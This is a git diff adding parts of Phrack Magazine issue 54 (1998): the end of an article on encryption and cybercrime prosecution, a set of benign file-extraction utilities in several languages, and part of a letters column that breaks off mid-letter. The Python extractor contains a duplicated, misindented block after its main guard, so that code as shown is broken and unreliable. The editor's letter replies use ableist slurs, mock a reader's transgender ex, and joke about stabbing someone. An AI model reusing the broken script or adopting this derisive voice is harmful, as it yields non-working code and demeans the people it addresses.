+Yet, even as law enforcement is educating itself on the challenges ahead,
+experts here said cyber-criminals continue to refine their abilities. 
+
+According to the DOJ's Charney, the number of cases involving encrypted
+data climbed from three percent in 1996 to seven percent in 1997. If that
+trend continues, he said, the only tactic left for law enforcement is to
+increase its surveillance capabilities.
+
+"If privacy advocates get their way on encryption," said Charney, "they
+may not be happy."
+
+With no way to read into encrypted electronic documents, he added, the FBI
+and others will have to rely on capturing the evidence at the source. "And
+that could really decrease privacy."
+
+Even so, there are other ways around encryption. In 1996, when an ISP
+reported that its system had been cracked, all FBI leads ran into brick
+walls. Luckily, the cracker, Carlos Salgado Jr. -- who had stolen over
+100,000 credit card numbers worth more than an estimated $160 million --
+found a potential buyer who suspected his credit card was one of the ones
+on the block to be sold. The "buyer" contacted the FBI and became a
+cooperative witness in the case.
+
+Despite Salgado's extensive use of encryption -- both his e-mails and the
+actual credit-card data were encrypted -- the FBI had no problems
+collecting evidence, because their witness received all the codes from
+Salgado.
+
+Luck, or a trend? It's too early to tell, but Gardner, for one, seems
+positive on the FBI's ability to prosecute. "If we know about it," she
+said, "we can usually prosecute it."
+
+----[  EOF
diff --git a/phrack54/12.txt b/phrack54/12.txt
new file mode 100644
index 0000000..7567fae
--- /dev/null
+++ b/phrack54/12.txt
@@ -0,0 +1,569 @@
+---[  Phrack Magazine   Volume 8, Issue 54 Dec 25th, 1998, article 12 of 12
+
+
+-------------------------[  Phrack Magzine Extraction Utility
+
+
+--------[  Phrack Staff
+
+
+    New this issue: A win32 version.
+
+
+---------------------8<------------CUT-HERE----------->8---------------------
+
+<++> EX/PMEU/extract3.c
+/*  extract.c by Phrack Staff and sirsyko
+ *
+ *  (c) Phrack Magazine, 1997, 1998
+ *      version 3 (P54): 07.14.98
+ *          - patched by Cipso to allow for redirection from stdin
+ *          - patched by route to return heap memory when no longer needed
+ *      version 2 (P53): 01.08.98 rewritten by route
+ *          - aesthetics
+ *          - now accepts file globs  
+ *      todo:
+ *          - more info in tag header (file mode, checksum)
+ *
+ *  Extracts textfiles from a specially tagged flatfile into a hierarchical 
+ *  directory strcuture.  Use to extract source code from any of the articles 
+ *  in Phrack Magazine (first appeared in Phrack 50).
+ *
+ *  gcc -o extract extract.c
+ *  
+ *  Usage: 
+ *
+ *  ./extract file1 file2 file3 ...
+ *      OR
+ *  bzip2 -dc P54-*.bz2 | ./extract -
+ */
+
+ 
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/stat.h>
+#include <string.h>
+#include <errno.h>
+#include <dirent.h>
+
+#define BEGIN_TAG   "<++> "
+#define END_TAG     "<-->"
+#define BT_SIZE     strlen(BEGIN_TAG)
+#define ET_SIZE     strlen(END_TAG)
+
+struct f_name
+{
+    u_char name[256];
+    struct f_name *next;
+};
+
+int
+main(int argc, char **argv)
+{ 
+    u_char b[256], *bp, *fn;
+    int i, j = 0;
+    FILE *in_p, *out_p = NULL; 
+    struct f_name *fn_p = NULL, *head = NULL, *tmp = NULL;
+    char *name;
+
+    if (argc < 2)
+    {
+        printf("Usage: %s file1 file2 ... filen\n", argv[0]);
+        exit(0); 
+    }
+
+    /*
+     *  Fill the f_name list with all the files on the commandline (ignoring
+     *  argv[0] which is this executable).  This includes globs.
+     */
+    for (i = 1; (fn = argv[i++]); )
+    {
+        if (!head)
+        {
+            if (!(head = (struct f_name *)malloc(sizeof(struct f_name))))
+            {
+                perror("malloc");
+                exit(1);
+            }
+            strncpy(head->name, fn, sizeof(head->name));
+            head->next = NULL;
+            fn_p = head;
+        }
+        else
+        {
+            if (!(fn_p->next = (struct f_name *)malloc(sizeof(struct f_name))))
+            {
+                perror("malloc");
+                exit(1);
+            }
+            fn_p = fn_p->next;
+            strncpy(fn_p->name, fn, sizeof(fn_p->name));
+            fn_p->next = NULL;
+        }
+    }
+    /*
+     *  Sentry node.
+     */
+    if (!(fn_p->next = (struct f_name *)malloc(sizeof(struct f_name))))
+    {
+        perror("malloc");
+        exit(1);
+     }
+    fn_p = fn_p->next;
+    fn_p->next = NULL;
+
+    /*
+     *  Check each file in the f_name list for extraction tags.
+     */
+    for (fn_p = head; fn_p->next;)
+    {
+        if (!strcmp(fn_p->name, "-"))
+        {
+               in_p = stdin;
+               name = "stdin";
+        }
+        else if (!(in_p = fopen(fn_p->name, "r")))
+        {
+            fprintf(stderr, "Could not open input file %s.\n", fn_p->name);
+	    continue;
+        }
+        else
+        {
+            name = fn_p->name;
+        }
+        fprintf(stderr, "Opened %s\n", name);        
+
+        while (fgets(b, 256, in_p))
+        { 
+            if (!strncmp (b, BEGIN_TAG, BT_SIZE))
+            { 
+	        b[strlen(b) - 1] = 0;           /* Now we have a string. */
+                j++;
+
+                if ((bp = strchr(b + BT_SIZE + 1, '/')))
+                {
+                    while (bp)
+                    {
+		        *bp = 0;
+		        if (mkdir(b + BT_SIZE, 0700) == -1 && errno != EEXIST)
+                        {
+                            perror("mkdir");
+                            exit(1);
+                        }
+		        *bp = '/';
+		        bp = strchr(bp + 1, '/'); 
+		    }
+                }
+                if ((out_p = fopen(b + BT_SIZE, "w")))
+                {
+                    printf("- Extracting %s\n", b + BT_SIZE);
+                }
+                else
+                {
+		    printf("Could not extract '%s'.\n", b + BT_SIZE);
+		    continue;
+	        }
+	    } 
+            else if (!strncmp (b, END_TAG, ET_SIZE))
+            {
+	        if (out_p) fclose(out_p);
+	        else
+                {
+                    fprintf(stderr, "Error closing file %s.\n", fn_p->name);
+                    continue;
+                }
+            } 
+            else if (out_p)
+            {
+                fputs(b, out_p);
+            }
+        }
+        if (in_p != stdin) fclose(in_p);
+        tmp = fn_p;
+        fn_p = fn_p->next;
+        free(tmp);
+    }
+    if (!j) printf("No extraction tags found in list.\n");
+    else printf("Extracted %d file(s).\n", j);
+    return (0);
+}
+
+/* EOF */
+<-->
+<++> EX/PMEU/extract.pl
+# Daos <daos@nym.alias.net>
+#!/bin/sh -- # -*- perl -*- -n
+eval 'exec perl $0 -S ${1+"$@"}' if 0;
+
+$opening=0;
+
+if (/^\<\+\+\>/) {$curfile = substr($_ , 5); $opening=1;};
+if (/^\<\-\-\>/) {close ct_ex; $opened=0;}; 
+if ($opening) {                        
+        chop $curfile;                 
+        $sex_dir= substr( $curfile, 0, ((rindex($curfile,'/'))) ) if ($curfile =~ m/\//);
+        eval {mkdir $sex_dir, "0777";}; 
+        open(ct_ex,">$curfile"); 
+        print "Attempting extraction of $curfile\n";
+        $opened=1; 
+}
+if ($opened && !$opening) {print ct_ex $_}; 
+<-->
+
+<++> EX/PMEU/extract.awk
+#!/usr/bin/awk -f
+#
+# Yet Another Extraction Script
+# - <sirsyko>
+#
+/^\<\+\+\>/ {
+        ind = 1
+        File = $2
+        split ($2, dirs, "/")
+        Dir="."
+        while ( dirs[ind+1] ) {
+                Dir=Dir"/"dirs[ind]
+                system ("mkdir " Dir" 2>/dev/null")
+                ++ind
+        }
+        next
+}
+/^\<\-\-\>/ {
+        File = ""
+        next
+}
+File { print >> File }
+<-->
+<++> EX/PMEU/extract.sh
+#!/bin/sh
+# exctract.sh : Written 9/2/1997 for the Phrack Staff by <sirsyko>
+#
+# note, this file will create all directories relative to the current directory
+# originally a bug, I've now upgraded it to a feature since I dont want to deal
+# with the leading / (besides, you dont want hackers giving you full pathnames
+# anyway, now do you :)
+# Hopefully this will demonstrate another useful aspect of IFS other than 
+# haxoring rewt
+#
+# Usage: ./extract.sh <filename>
+
+cat $* | (
+Working=1
+while [ $Working ];
+do
+        OLDIFS1="$IFS"
+        IFS=
+        if read Line; then
+                IFS="$OLDIFS1"
+                set -- $Line
+                case "$1" in
+                "<++>") OLDIFS2="$IFS"
+                        IFS=/
+                        set -- $2
+                        IFS="$OLDIFS2"
+                        while [ $# -gt 1 ]; do
+                                File=${File:-"."}/$1
+                                if [ ! -d $File ]; then
+                                        echo "Making dir $File"
+                                        mkdir $File
+                                fi
+                                shift
+                        done                               
+                        File=${File:-"."}/$1
+                        echo "Storing data in $File"
+                ;;
+                "<-->") if [ "x$File" != "x" ]; then
+                                unset File
+                        fi ;;
+                *)      if [ "x$File" != "x" ]; then
+                                        IFS=
+                                        echo "$Line" >> $File
+                                        IFS="$OLDIFS1"
+                        fi
+                ;;
+                esac
+                IFS="$OLDIFS1"
+        else
+                echo "End of file"
+                unset Working
+        fi
+done
+)                                                                    
+<-->
+<++> EX/PMEU/extract.py
+#! /bin/env python
+# extract.py    Timmy 2tone <_spoon_@usa.net>
+
+import sys, string, getopt, os
+
+class Datasink:
+    """Looks like a file, but doesn't do anything."""
+    def write(self, data): pass
+    def close(self): pass
+
+def extract(input, verbose = 1):
+    """Read a file from input until we find the end token."""
+
+    if type(input) == type('string'):
+        fname = input
+        try: input = open(fname)
+        except IOError, (errno, why):
+            print "Can't open %s: %s" % (fname, why)
+            return errno
+    else:
+        fname = '<file descriptor %d>' % input.fileno()
+
+    inside_embedded_file = 0
+    linecount = 0
+    line = input.readline()
+    while line:
+
+        if not inside_embedded_file and line[:4] == '<++>':
+
+            inside_embedded_file = 1
+            linecount = 0
+
+            filename = string.strip(line[4:])
+            if mkdirs_if_any(filename) != 0:
+                pass
+
+            try: output = open(filename, 'w')
+            except IOError, (errno, why):
+                print "Can't open %s: %s; skipping file" % (filename, why)
+                output = Datasink()
+                continue
+
+            if verbose:
+                print 'Extracting embedded file %s from %s...' % (filename,
+                                                                  fname),
+
+        elif inside_embedded_file and line[:4] == '<-->':
+            output.close()
+            inside_embedded_file = 0
+            if verbose and not isinstance(output, Datasink):
+                print '[%d lines]' % linecount
+
+        elif inside_embedded_file:
+            output.write(line)
+
+        # Else keep looking for a start token.
+        line = input.readline()
+        linecount = linecount + 1
+
+def mkdirs_if_any(filename, verbose = 1):
+    """Check for existance of /'s in filename, and make directories."""
+
+    path, file = os.path.split(filename)
+    if not path: return
+
+    errno = 0
+    start = os.getcwd()
+    components = string.split(path, os.sep)
+    for dir in components:
+        if not os.path.exists(dir):
+            try:
+                os.mkdir(dir)
+                if verbose: print 'Created directory', path
+
+            except os.error, (errno, why):
+                print "Can't make directory %s: %s" % (dir, why)
+                break
+
+        try: os.chdir(dir)
+        except os.error, (errno, why):
+            print "Can't cd to directory %s: %s" % (dir, why)
+            break
+
+    os.chdir(start)
+    return errno
+
+def usage():
+    """Blah."""
+    die('Usage: extract.py [-V] filename [filename...]')
+
+def main():
+    try: optlist, args = getopt.getopt(sys.argv[1:], 'V')
+    except getopt.error, why: usage()
+    if len(args) <= 0: usage()
+
+    if ('-V', '') in optlist: verbose = 0
+    else: verbose = 1
+
+    for filename in args:
+        if verbose: print 'Opening source file', filename + '...'
+        extract(filename, verbose)
+
+def db(filename = 'P51-11'):
+    """Run this script in the python debugger."""
+    import pdb
+    sys.argv[1:] = ['-v', filename]
+    pdb.run('extract.main()')
+
+def die(msg, errcode = 1):
+    print msg
+    sys.exit(errcode)
+
+if __name__ == '__main__':
+    try: main()
+    except KeyboardInterrupt: pass
+
+
+    except getopt.error, why: usage()
+    if len(args) <= 0: usage()
+
+    if ('-V', '') in optlist: verbose = 0
+    else: verbose = 1
+
+    for filename in args:
+        if verbose: print 'Opening source file', filename + '...'
+        extract(filename, verbose)
+
+def db(filename = 'P51-11'):
+    """Run this script in the python debugger."""
+    import pdb
+    sys.argv[1:] = [filename]
+    pdb.run('extract.main()')
+
+def die(msg, errcode = 1):
+    print msg
+    sys.exit(errcode)
+
+if __name__ == '__main__':
+    try: main()
+    except KeyboardInterrupt: pass              # No messy traceback.
+<-->
+<++> EX/PMEU/extract-win.c
+/***************************************************************************/
+/* WinExtract                                                              */
+/*                                                                         */
+/* Written by Fotonik <fotonik@game-master.com>.                           */
+/*                                                                         */
+/* Coding of WinExtract started on 22aug98.                                */
+/*                                                                         */
+/* This version (1.0) was last modified on 22aug98.                        */
+/*                                                                         */
+/* This is a Win32 program to extract text files from a specially tagged   */
+/* flat file into a hierarchical directory structure.  Use to extract      */
+/* source code from articles in Phrack Magazine.  The latest version of    */
+/* this program (both source and executable codes) can be found on my      */
+/* website:  http://www.altern.com/fotonik                                 */
+/***************************************************************************/
+
+
+#include <stdio.h>
+#include <string.h>
+#include <windows.h>
+
+
+void PowerCreateDirectory(char *DirectoryName);
+
+
+int WINAPI WinMain(HINSTANCE hThisInst, HINSTANCE hPrevInst,
+                   LPSTR lpszArgs, int nWinMode)
+{
+OPENFILENAME OpenFile; /* Structure for Open common dialog box */
+char InFileName[256]="";
+char OutFileName[256];
+char Title[]="WinExtract - Choose a file to extract files from.";
+FILE *InFile;
+FILE *OutFile;
+char Line[256];
+char DirName[256];
+int FileExtracted=0;   /* Flag used to determine if at least one file was */
+int i;                 /* extracted */
+
+ZeroMemory(&OpenFile, sizeof(OPENFILENAME));
+OpenFile.lStructSize=sizeof(OPENFILENAME);
+OpenFile.hwndOwner=HWND_DESKTOP;
+OpenFile.hInstance=hThisInst;
+OpenFile.lpstrFile=InFileName;
+OpenFile.nMaxFile=sizeof(InFileName)-1;
+OpenFile.lpstrTitle=Title;
+OpenFile.Flags=OFN_FILEMUSTEXIST | OFN_HIDEREADONLY;
+
+if(GetOpenFileName(&OpenFile))
+   {
+   if((InFile=fopen(InFileName,"r"))==NULL)
+      {
+      MessageBox(NULL,"Could not open file.",NULL,MB_OK);
+      return 0;
+      }
+
+   /* If we got here, InFile is opened. */
+   while(fgets(Line,256,InFile))
+      {
+      if(!strncmp(Line,"<++> ",5)) /* If line begins with "<++> " */
+         {
+         Line[strlen(Line)-1]='\0';
+         strcpy(OutFileName,Line+5);
+
+         /* Check if a dir has to be created and create one if necessary */
+         for(i=strlen(OutFileName)-1;i>=0;i--)
+            {
+            if((OutFileName[i]=='\\')||(OutFileName[i]=='/'))
+               {
+               strncpy(DirName,OutFileName,i);
+               DirName[i]='\0';
+               PowerCreateDirectory(DirName);
+               break;
+               }
+            }
+
+         if((OutFile=fopen(OutFileName,"w"))==NULL)
+            {
+            MessageBox(NULL,"Could not create file.",NULL,MB_OK);
+            fclose(InFile);
+            return 0;
+            }
+
+         /* If we got here, OutFile can be written to */
+         while(fgets(Line,256,InFile))
+            {
+            if(strncmp(Line,"<-->",4)) /* If line doesn't begin w/ "<-->" */
+               {
+               fputs(Line, OutFile);
+               }
+            else
+               {
+               break;
+               }
+            }
+         fclose(OutFile);
+         FileExtracted=1;
+         }
+      }
+   fclose(InFile);
+   if(FileExtracted)
+      {
+      MessageBox(NULL,"Extraction sucessful.","WinExtract",MB_OK);
+      }
+   else
+      {
+      MessageBox(NULL,"Nothing to extract.","Warning",MB_OK);
+      }
+   }
+   return 1;
+}
+
+
+/* PowerCreateDirectory is a function that creates directories that are */
+/* down more than one yet unexisting directory levels.  (e.g. c:\1\2\3) */
+void PowerCreateDirectory(char *DirectoryName)
+{
+int i;
+int DirNameLength=strlen(DirectoryName);
+char DirToBeCreated[256];
+
+for(i=1;i<DirNameLength;i++) /* i starts at 1, because we never need to */
+   {                         /* create '/' */
+   if((DirectoryName[i]=='\\')||(DirectoryName[i]=='/')||
+      (i==DirNameLength-1))
+      {
+      strncpy(DirToBeCreated,DirectoryName,i+1);
+      DirToBeCreated[i+1]='\0';
+      CreateDirectory(DirToBeCreated,NULL);
+      }
+   }
+}
+<-->
+----[  EOF
diff --git a/phrack54/2.txt b/phrack54/2.txt
new file mode 100644
index 0000000..6afdc14
--- /dev/null
+++ b/phrack54/2.txt
@@ -0,0 +1,811 @@
+---[  Phrack Magazine   Volume 8, Issue 54 Dec 25th, 1998, article 02 of 12
+
+
+-------------------------[  P H R A C K     54     L O O P B A C K
+
+
+--------[  Phrack Staff
+
+
+Phrack Loopback is your chance to write to the Phrack staff with your
+comments, questions, or whatever.  The responses are generally written by
+the editor, except where noted.  The actual letters are perhaps edited
+for format, but generally not for grammar and/or spelling.  We try not to
+correct the vernacular, as it often adds a colorful perspective to the
+letter in question.
+
+
+0x1>--------------------------------------------------------------------------
+
+My boyfriend turned homself into a transexual and dumped me for another
+guy.What could you do to help me (please)show him how much I appreciate him?
+Or,what should I do?THIS letter is no prank.This truly happened and I was
+hoping for some advice from you so PLEASE don't blow up my
+computer.Sincerely,B.C.
+
+    [ I swear to god this is an actual letter.  I can't make this stuff up
+      (no sarcastic commentary needed here). ]
+
+0x2>--------------------------------------------------------------------------
+
+An interesting zine you have, but I have to say my favourite part is
+the loopback section. The writing in the letters is passing at best,
+while the satirical commentary is absolutely first rate. I just read
+loopback from #53 and I just kept laughing. Way to go. Hey, as I
+say, don't take life seriously, it doesn't take you seriously.
+
+    [ Thank you.  We aim to please. ]
+
+0x3>--------------------------------------------------------------------------
+
+What is the system a school uses called?  PBX?  How can I hack the system
+and what type of priveleges can I gain?
+
+LocoJ
+
+    [ You can listen to the school officials talking about how much of a 
+      retard they think you are and how they are going to hold you back another
+      year. ]
+
+0x4>--------------------------------------------------------------------------
+
+Have you ever wandered how people called hackers keep on annoying government
+agencies and major corporations?
+
+    [ I often find myself wandering that very thing. ]
+
+Most secure government information is not a secret to these people, no
+protection guarantees safety against their breaking in. 
+
+    [ No one can eat just one! ]
+
+Some people may think that in order to be a hacker one must be extraordinary
+smart, use expensive equipment and have contacts with the underground world.
+
+    [ That's about the size of it.  And we all have sex with models.  That's
+      key. ]
+
+This is not true.  Recent studies show that a computer user is at least
+twenty percent smarter than an average person.
+
+    [ Uh.  Yah.  That's a great statistic.  Who doesn't use a computer
+      these days?  The only people not using computers are either mumbling
+      retards or are hooked up to computers to live.  ]
+
+If you are reading this you are smart enough.
+
+    [ However, if you are *writing* it, evidently, you're not. ]
+
+All the equipment you need is your computer and modem.  And try to avoid
+contacts with the underground world - they are trouble.
+
+    [ Indeed.  Stay away from the people who really know what they are doing.
+      Be sure to blanket yourself with blissful ignorance.  Live a sheltered
+      life alone.  Stay away from people.  They will only hurt you with
+      words. ]
+
+All you really need is information.
+
+    [ "..which you won't get here!" ]
+
+For the first time information kept secret both by government and hackers is
+available to public. Our informational report contains everything you need to
+know about hacking including: *"Hackers 101" - the ultimate and comprehensive
+step by step guide to how it's done. This incredible guide written by an
+accomplished hacker especially for beginners will answer following questions:
+
+    [ Accomplished at bathing himself and being able to tie his left shoelace
+      and most of the right one. ]
+
+-What should you know about hacking and where to start?
+
+    [ Start at your local brothel! ]
+
+-Programs needed.
+-List of access numbers.
+
+    [ How about a list explaining what these numbers are supposed to access. ]
+
+-How keep yourself safe.
+-Cracking programs, what they do and how they work.
+-UNIX, an easy approach.
+-Password shadowing.
+-Dialouts.
+-Scanners.
+-Brute force hacking.
+..and much more.
+
+    [ -programing for the ultimate idiot
+      -hookers and pimps: a two day tutorial
+      -circus animal social engineering
+      -building chicken flavored air conditioners ]
+
+*Hacker resources on the Internet: The most complete collection of real life
+hackers websites where you can find:
+-programs
+-tools
+-scripts
+-most recent know-how and techniques
+-news from the world of hacking
+
+    [ NEWSFLASH:  YOU SUCK ]
+
+-tones of other useful information.
+
+You can receive our report as a printed material (only $9), on a floppy in
+*.txt format (only $7) or by email in *.txt format/ZIP file (only $7).
+
+    [ And you can receive a thump on the head from the Phrack staff if you
+      actually send these precious retards any money. ]
+
+For domestic orders S&H is $1. For orders from Alaska, Hawaii and foreign
+countries please add $5 for S&H. For email orders S&H does not apply.  Order
+now and as a free bonus you will receive a guide to Internet sites with
+thousands of totally free software titles (limited time only). Send cash,
+check or money order to:
+
+TWS, PO Box 1357 Rancho
+Cordova, CA 95741.
+
+For check orders please allow one week for clearance.
+
+    [ ...so i can ask my mom to cash it for me... ]
+
+Disclaimer:
+Please keep in mind that any information we provide is for educational
+purposes only.
+
+    [ Educational?  Try mildly recreational at best. ]
+
+TWS is not responsible for any actions of its clients.
+
+    [ ...because we have no clients... ]
+
+0x5>--------------------------------------------------------------------------
+
+Before I start, if this is the wrong address I should be grovelling to
+then I apologize profusely.
+
+    [ It's probably not the wrong address, but I accept your apology for
+      what will probably be an inane question. ]
+
+I'm relatively new to the entire computer world.  I mean I've had a
+computer for a number of years and the internet for about 15 months but
+I feel that I don't know enough.  
+
+    [ As if one can ever feel that she `knows enough`. ]
+
+I'm BORED with what I can do and I was wondering if you could tell me or
+
+    [ Bored with nothing I can understand. ]
+
+perhaps face me in the direction I need to go to learn how to hack.  The
+very basics.  The amoeba level of hacking if you will.  
+
+    [ Ok.  Start small.  Start with hacking napkins and forks and spoons,
+      then slowly move onto more complex devices like drawers and scissors.
+      Someday you can move on to wall clocks and `the clapper`.  You'll
+      get there eventually. ]
+
+Ever since I've been online I've always wanted to know how to hack.  You
+see the articles on captured hackers and the news on firms trying to boost
+online security and it makes you want to go out there do stuff.
+So if you've got the
+
+    [ "Do stuff"?  Well.  You've certainly got the right mentality.  Hey, 
+       maybe sometime I can come over to your house and we can watch T.V. or
+       listen to CDs or something. ]
+
+time, it would really be appreciated.
+
+                                        Much appreciated,
+                                        -Dallor
+
+0x6>--------------------------------------------------------------------------
+
+do you have a chat room? i was told you could teach me some stuff about
+computers.i am very new to the computer world @ my old age.i mess my system
+at every 2weeks do to the fact i dont know what to do!
+
+    [ I suggest you look into other hobbies.  Maybe nursery rhyming? ]
+ 
+- naynay
+
+    [ Sha-naynay! ]
+
+0x7>--------------------------------------------------------------------------
+
+Hello, just wanted to congratulate you guys for an excellent
+magazine and keep up the hard work. Also I have noticed that
+ppl can ask for things. So could I please have a two storey
+mansion, Porsche, Harley Davidson, yacht, five million dollars,
+seven beautiful girls (one for each night), ..................
+.............................................. thank you :-))
+
+
+cheers Rundus
+
+    [ You are a shallow materialistic person Rundus.  People all over the
+      world are suffering from famine and disease.  Maybe you should give
+      some thought to them. ]
+
+0x8>--------------------------------------------------------------------------
+
+[ P53-02@0x12: ... I would like to know more about marshmellows... ]
+
+Well, since Phrack has gifted me with so much knowledge, it's time for me
+to start giving back!
+
+    [ NIGH time if you ask me... ]
+
+Marshmellows date back to Ancient Egypt where the ancients took the roots
+from a mallow plant/tree and made it into a sticky paste. From there it
+was cooked to form a puffy yellowish treat for the Pharoahs and such. The
+mallow "treat" became popular in the 30's as a confectionary treat.  However,
+due to the long process of making these treats, they did not reach the
+popularity of today until Marshmellow making was revolutionized in the 60's.
+The "jet-puffed" method was introduced. The sticky base material was mixed
+with sugars and other additives and puffed using a airation type machine.
+The marshmellow comes out of the machine in long tubes and is cut to form
+the shape of what we know as marshmellows today.
+
+For the history of corn flakes, SPAM, or Jello, please contact your
+neighborhood loser.
+
+    [ Hrm.  I suppose you think marshmellows are in the upper echelon of
+      confectioneries?  WHAT GIVES YOU THE RIGHT? ]
+
+My thirst for knowledge is not limited to computer systems.  Sadly..
+
+Ray K.
+
+    [ Tune in next issue when Ray gives a dissertation on Peter Scolari's
+      career in the television industry entitled: "From Bosom Buddy to
+      Honey I'm Drunk Again and Out of Work"... ]
+
+0x9>--------------------------------------------------------------------------
+
+Hey!
+I was wondering if you could help me to find some things?
+
+    [ Sorry bro.  I don't know where your family is.  I think they've ditched
+      you.  I say pick up and move on. ]
+
+Well I'm in to games. And I know that x-files have got a game with the
+same name. Do you know where I can find it so that I can download the
+game on my computer???
+
+    [ Hrm.  Try Best Buy or maybe Babbages. ]
+
+And do you know some good sites where you can find ONLY mp3s???
+
+          Thanks for your time
+                  Cybers
+
+    [ What an excellent and unique nickname! ]
+
+0xa>--------------------------------------------------------------------------
+
+Pretty clever.........I saw the web page on the tv........PHRACK......bein'
+where you come from wasn't hard to find this page.......
+
+    [ Uh.  Rite. ]
+
+Just thought it was hilarious and totally in the right to show that not
+everyone is as safe as they would like to think.....  A SUPPORTER of your
+beliefs I am......
+
+    [ Cool.  We need more zealots for our secret army. ]
+
+Thanks fer showin hacks still live a breath beneath everyone else........
+
+    [ Huh? ]
+
+after all it's only wrong if you get caught......consequences dictate the
+course of ACTION...(REV. JAMES KEENAN MAYNARD,tool)
+
+    [ Well, actually, getting caught is independent of equity.  And letting
+      consequences dictate the course of action seems rather backward and
+      after-the-fact-ish. ]
+
+Bit-Basher......
+
+0xb>--------------------------------------------------------------------------
+
+Just thought I would write in to voice my concern about a growing problem
+in our community: Lamers and Idiots.
+
+Alot of the time people ask me what makes up a lamer.
+
+    [ Perhaps they are asking you because you fit the mold so nicely. ]
+
+IN my opinion, if you are 2 or more of these, you are a lamer/idiot.
+
+    [ In my opinion, you are an idiot if you make lists about what comprises
+      idiocy. ]
+
+1- unnecessarily ask for information that any damned idiot could find in
+10 minutes on a search engine
+
+    [ Somehow I doubt people of any level of intelligence come to you for
+      answers.  Idiots can smell each other out pretty well. ]
+
+2- Talk in leet-speek ("haY d00dZ Eye'm uhn 3l33t hax0r, g1v3 m3 p455w0rd5!")
+and expect everyone to give you the slightest sliver of respect
+
+    [ Please don't ever email me or Phrack Magazine again.  I don't care
+      how much of a good idea it seems, don't do it.  The heat death of the
+      universe had better happen before I hear from you again. ]
+
+3- Shoot your mouth off about stuff you know NOTHING about
+
+    [ Or in your case, ANYTHING. ]
+
+4- Claim to run or own high sites (ArchAngel claiming to own the L0pht is an
+excellent example).
+
+    [ Who the hell is that? ]
+
+5- Ask for exact instructions on how to hack a site
+
+    [ A little game I like to play when I'm bored is `find the moron`.  Woop!
+      There you are! ]
+
+There's more criteria, I'm sure, but I just can't think of it.
+
+    [ BUT HOW WILL THE IDIOTS AMONG US COPE!@? ]
+
+Newbies constantly ask to be taught.As for the newbies out there -
+who are on the verge of becoming lamers - I think the best advice we can
+
+    [ Oh.  No.  Nono.  Don't do that.  Please.  `We`.  Do not refer to us as
+      peers. ]
+
+give them is that hacking is not a "teachable" skill. It's something that
+has to be learned through experience - you have to know how things work,
+how things interact, and that invlves educating yourself. Never rely on
+someone else to give you acurate information - always look for the facts.
+
+    [ Good plan.  Never attempt to learn from anyone.  Be your own mentor.
+      School yourself in ignorance. ]
+
+Well, I'm not really sure what that rant was about but thanks for
+listening to it..
+
+    [ Well if you don't then I sure as hell have *no* fucking idea. ]
+
+{BTW Phrack 53 was great. Keep it up.}
+
+    [ Hey Thanks!  Always nice to hear when we're doing a good job! ]
+
+0xc>--------------------------------------------------------------------------
+
+Hey, i'm new at this. how do i get started? see i want to find out some
+yahoo codes. is there anything i should know? i don't have a clue what
+is legal and what is not...
+
+    [ Ok.  That's simple.  `Cyberspace` is kinda like the Old West.  There's
+      one guy who hangs out and deters criminals with his magic busket of
+      moral redemption.  Any wrong-doer who comes in contact with it instantly
+      regrets his sin and is then forgiven.  The busket is faulty though and
+      sometimes (about 30% of the time) the person just explodes.  However,
+      scientists and alchemists from Brown University are working on a magic
+      pill that will prevent this occasional exploding.  It doesn't so much
+      *prevent* the exploding though, as much as it pieces the person back
+      together *after* the explosion.  The rub is that you have to take the
+      pill prior to explosion.  And no one wants to take the pill because it's
+      like a red flag to the authorities that you are a wrongdoer.
+
+      Oh wait, maybe that was a dream I had. ]
+
+form Bisker
+
+    [ Shape-of... a spider monkey!  Form-of... a bisker! ]
+
+0xd>--------------------------------------------------------------------------
+
+I need help I know you must be thinking that I am some lamer with AOL and
+Windows who will never in his life become a hacker.
+
+    [ I kinda just had you pegged as someone who is scared of punctuation. ]
+
+Well, most of that is true but I (Hopefully in time) will become a hacer.
+
+    [ Godspeed. ]
+
+I need to know how do I protect my computer from other hackers?
+
+    [ Ok, I'll give you an insider tip.  Here's what we do to keep our
+      computers safe from electronic ruffians:  we use them once, then throw
+      them away. ]
+
+Are there any .txt documents that you think I should read?
+
+    [ Check out the one entitled `My Two Mommies`.  It answered _a lot_ of
+      questions for me. ]
+
+I need all I can get on this topic so i can finally move on to the next step
+(I don't know what that is yet my friend is helping me become a hacker).
+
+    [ Did he read "My Two Mommies"?  If not, he's a charlatan.  He's probably
+      just telling what you want to hear so you'll sleep with him.  I'd shank
+      him once in the leg to be safe. ]
+
+I don't care how many things I have to read just as long as I can become a
+hacker.
+
+    [ Just think!  If you're reading this, you're *that* much closer! ]
+
+P.S. I had no clue who to send this to so I picked you (Doesn't that make you
+feel special?). Also please don't make this public I went to some websites and
+found Hackers love making fun of lamers and posting the mail they get on there
+sites so I have this feeling that your going to post this letter somewhere.
+Just don't please.
+
+    [ Not a problem.  I'll keep this to private email. ]
+
+0xe>--------------------------------------------------------------------------
+
+Just browsed yr web page... you are an interesting person.
+
+    [ Agreed. ]
+
+I 'd love to come to your r00t party (honest); may I?
+
+    [ Absolutely not. ]
+
+I leave in greece and I am planing to travel to the u.s. this xmas.
+
+    [ That's nice. ]
+
+It would be a grate opertunity for me to meet you and your friends.
+
+    [ Yes, but it's just as good an opportunity for you not to meet us. ]
+
+PS: I am not a hacker, I just admire your work.
+
+    [ Well, thank you very much.  That's good to hear. ]
+
+                             liquid, Wed Sep 16 06:24:09 1998
+
+0xf>--------------------------------------------------------------------------
+
+hi todos
+
+    [ Who? ]
+
+i was just reading some files about hacking and phreaking by french writters
+than one or two suggestions came to my mind
+
+(i) stop writing like a pre-pubescent boy with lot of ***eZ and B1abL4(blabla)
+
+    [ YAH!  YOU DAMN FRENCH COMMIE NAZI BASTARDS! ]
+
+(ii)be more explicit and professional like in PHRACK
+
+    [ YAY AMERICA! ]
+
+so i hope that i have rung the bell to the wrong door, and that the french
+scene does not look like that.
+
+    [ Huh? ]
+
+another thing: does hack include studying and find flaws in religious system ?
+
+    [ Shure, why not? ]
+
+because in fact religious system are formal system based and we can always find
+paradox (godel's theorem) if yes i would have a futur paper for phrack
+
+    [ Alright. ]
+
+i have an os name for mythrandir 'TRYOS' it's very short and really summerises
+his work
+
+THANK FOR ALL YOU DO FOR THE HACKER COMMUNITY
+PHRACK IS THE BEST THING I HAVE EVER READ
+
+    [ WELL GOOD.  IT'S THE BEST THING I HAVE EVER WRITTEN. ]
+
+TFAYD.                   
+
+0x10>-------------------------------------------------------------------------
+
+man just to let you know, this is some very "educational" info.  can't
+say that i learned a lot, but this info help me catch up the past five
